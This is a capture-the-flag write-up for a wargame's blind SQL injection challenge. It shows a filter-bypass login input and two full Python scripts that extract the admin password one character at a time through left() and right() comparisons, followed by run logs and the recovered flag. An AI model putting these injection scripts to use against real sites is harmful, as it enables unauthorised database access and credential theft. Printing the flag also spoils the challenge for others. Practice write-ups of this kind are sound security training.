Suninatas Game 23

challenges

Game 23

<!-- Hint 1 : guest / guest & Your goal is to find the admin's pw -->
<!-- Hint 2 : Bypass 'admin' string -->
<!-- M@de by 2theT0P -->

Hard Blind Sql Injection
Filtering Keywords
admin/ select / Union / by / having / substring
from / char / delay / 0x / hex / asc / desc ..........

GET http://suninatas.com/challenge/web23/web23.asp?id=admin&pw=admin HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Referer: http://suninatas.com/challenge/web23/web23.asp
Cookie: ASPSESSIONIDCCRRBDTT=GGEJLNGDLBDFBJJEENBHDHDL
Upgrade-Insecure-Requests: 1
Priority: u=0, i

# test
id: ad'+'min'and 1=1 --
pw: arst
# get OK admin

# get <td colspan="2" align="center" bgcolor="cccccc">No hack</td>
#!/usr/bin/env python3
"""
Blind SQL Injection Script
Automates character-by-character extraction via substring-based comparisons.
Target: suninatas.com Challenge 22
"""

import requests
import string
import sys

# --- Configuration ---
# Challenge endpoint; the same path as in the captured browser request above.
TARGET_URL = "http://suninatas.com/challenge/web23/web23.asp"
# ASP session cookie sent with every request; presumably the logged-in
# challenge session -- confirm it is still valid before a run.
COOKIES = { "ASPSESSIONIDAASRCCSR": "OAJDDHCCMDNKFDFPBKCECLBN" }

# Candidate characters tried at each position, in this order.
CHARSET = string.ascii_letters + string.digits + "!@#$%^&*()_+"
# Upper bound on the number of positions probed.
MAX_LENGTH = 31
# Page fragment that marks a true comparison (login reported as admin).
SUCCESS_INDICATOR = "OK <font size=4 color=blue>admin"
# Page fragment returned when the server-side keyword filter rejects the input.
ERROR_INDICATOR = "No hack"

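def check_str(count, string):
    """Return True if the first ``count`` characters of pw equal ``string``.

    Sends one request whose ``id`` field carries the comparison
    ``left(pw, count) = 'string'`` and reads the answer off the page body.

    Args:
        count: number of leading characters compared.
        string: candidate prefix. Interpolated verbatim, so the result is only
            meaningful for characters from CHARSET (no quotes). The name
            shadows the stdlib ``string`` module inside this function; that is
            harmless because the module is not used here.

    Returns:
        True when SUCCESS_INDICATOR appears in the body, False otherwise --
        including on a transport error, which is printed but not raised, so a
        flaky connection reads as "no match" for that candidate.

    Raises:
        SystemExit(1) when the body contains ERROR_INDICATOR: the filter has
        rejected the request and further probes would only misreport results.
    """
    params = {
        'id': f"'or left(pw,{count})='{string}'--",
        'pw': 'ar',
    }

    try:
        # requests percent-encodes the params, so no manual URL encoding here.
        response = requests.get(TARGET_URL, params=params, cookies=COOKIES, timeout=5)
    except requests.RequestException as e:
        print(f"\n[!] Request error: {e}")
        return False

    body = response.text
    if ERROR_INDICATOR in body:
        # sys.exit with a non-zero status instead of the site-module exit():
        # exit() is only guaranteed in interactive sessions and returned 0.
        print(f"\n[!] Error: {body}")
        sys.exit(1)
    return SUCCESS_INDICATOR in body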

def main():
    """Recover the value left to right: each round fixes one more character.

    For position i, every CHARSET character is tried as the next character
    after what is already known. The first match is kept; if no candidate
    matches, or MAX_LENGTH is reached, the search stops and the recovered
    string is printed.
    """
    print(f"[*] Starting Blind SQL Injection on {TARGET_URL}")
    print(f"[*] Target max length: {MAX_LENGTH}")

    recovered = ""
    out = sys.stdout

    for position in range(1, MAX_LENGTH + 1):
        out.write(f"[*] Finding char {position:02}: ")
        out.flush()

        # for/else: the else branch runs only when no candidate matched.
        for candidate in CHARSET:
            if check_str(position, recovered + candidate):
                recovered += candidate
                out.write(f"{candidate}\n")
                out.flush()
                break
        else:
            out.write("None found. Stopping.\n")
            break

    print("\n" + "=" * 30)
    print(f"EXTRACTED DATA: {recovered}")
    print("=" * 30)

if __name__ == "__main__":
    # Run only when executed as a script, not when imported.
    main()
❯ python sqli_blind.py
[*] Starting Blind SQL Injection on http://suninatas.com/challenge/web23/web23.asp
[*] Target max length: 31
[*] Finding char 01: v
[*] Finding char 02: 3
[*] Finding char 03: r
[*] Finding char 04: y
[*] Finding char 05: h
[*] Finding char 06: a
[*] Finding char 07: r
[*] Finding char 08: d
[*] Finding char 09: s
[*] Finding char 10: q
[*] Finding char 11:
[!] Error:

# get v3ryhardsq

Need the right-side version of the script.

#!/usr/bin/env python3
"""
Blind SQL Injection Script
Automates character-by-character extraction via substring-based comparisons.
Target: suninatas.com Challenge 22
"""

import requests
import string
import sys

# --- Configuration ---
# Challenge endpoint; the same path as in the captured browser request above.
TARGET_URL = "http://suninatas.com/challenge/web23/web23.asp"
# ASP session cookie sent with every request; presumably the logged-in
# challenge session -- confirm it is still valid before a run.
COOKIES = { "ASPSESSIONIDAASRCCSR": "OAJDDHCCMDNKFDFPBKCECLBN" }

# Candidate characters tried at each position, in this order.
CHARSET = string.ascii_letters + string.digits + "!@#$%^&*()_+"
# Upper bound on the number of positions probed.
MAX_LENGTH = 31
# Page fragment that marks a true comparison (login reported as admin).
SUCCESS_INDICATOR = "OK <font size=4 color=blue>admin"
# Page fragment returned when the server-side keyword filter rejects the input.
ERROR_INDICATOR = "No hack"

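def check_str(count, string):
    """Return True if the last ``count`` characters of pw equal ``string``.

    Sends one request whose ``id`` field carries the comparison
    ``right(pw, count) = 'string'`` and reads the answer off the page body.

    Args:
        count: number of trailing characters compared.
        string: candidate suffix. Interpolated verbatim, so the result is only
            meaningful for characters from CHARSET (no quotes). The name
            shadows the stdlib ``string`` module inside this function; that is
            harmless because the module is not used here.

    Returns:
        True when SUCCESS_INDICATOR appears in the body, False otherwise --
        including on a transport error, which is printed but not raised, so a
        flaky connection reads as "no match" for that candidate.

    Raises:
        SystemExit(1) when the body contains ERROR_INDICATOR: the filter has
        rejected the request and further probes would only misreport results.
    """
    params = {
        'id': f"'or right(pw,{count})='{string}'--",
        'pw': 'ar',
    }

    try:
        # requests percent-encodes the params, so no manual URL encoding here.
        response = requests.get(TARGET_URL, params=params, cookies=COOKIES, timeout=5)
    except requests.RequestException as e:
        print(f"\n[!] Request error: {e}")
        return False

    body = response.text
    if ERROR_INDICATOR in body:
        # sys.exit with a non-zero status instead of the site-module exit():
        # exit() is only guaranteed in interactive sessions and returned 0.
        print(f"\n[!] Error: {body}")
        sys.exit(1)
    return SUCCESS_INDICATOR in body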

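def main():
    """Recover the value from the right: each round fixes one more trailing char.

    check_str() compares ``right(pw, i)`` against the candidate, so the
    candidate for round i is ``char + recovered`` -- the new character goes in
    FRONT of what is already known. The original loop tested that but then
    stored ``recovered + char`` (the prefix-script order), so from round three
    on it probed suffixes that had never matched; that is the likely cause of
    the recorded run going wrong at char 03 -- confirm. The stored value must
    be exactly the string that was tested.

    Stops at the first position where no candidate matches, or after
    MAX_LENGTH positions, then prints the recovered string.
    """
    print(f"[*] Starting Blind SQL Injection on {TARGET_URL}")
    print(f"[*] Target max length: {MAX_LENGTH}")

    recovered = ""
    out = sys.stdout

    for position in range(1, MAX_LENGTH + 1):
        out.write(f"[*] Finding char {position:02}: ")
        out.flush()

        # for/else: the else branch runs only when no candidate matched.
        for candidate in CHARSET:
            suffix = candidate + recovered
            if check_str(position, suffix):
                # Keep exactly what was tested so the next round extends it.
                recovered = suffix
                out.write(f"{candidate}\n")
                out.flush()
                break
        else:
            out.write("None found. Stopping.\n")
            break

    print("\n" + "=" * 30)
    print(f"EXTRACTED DATA: {recovered}")
    print("=" * 30)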

if __name__ == "__main__":
    # Run only when executed as a script, not when imported.
    main()
❯ python sqli_blind_1.py
[*] Starting Blind SQL Injection on http://suninatas.com/challenge/web23/web23.asp
[*] Target max length: 31
[*] Finding char 01: i
[*] Finding char 02: l
[*] Finding char 03:
Error ??? I don't know.
v3ryhardsqli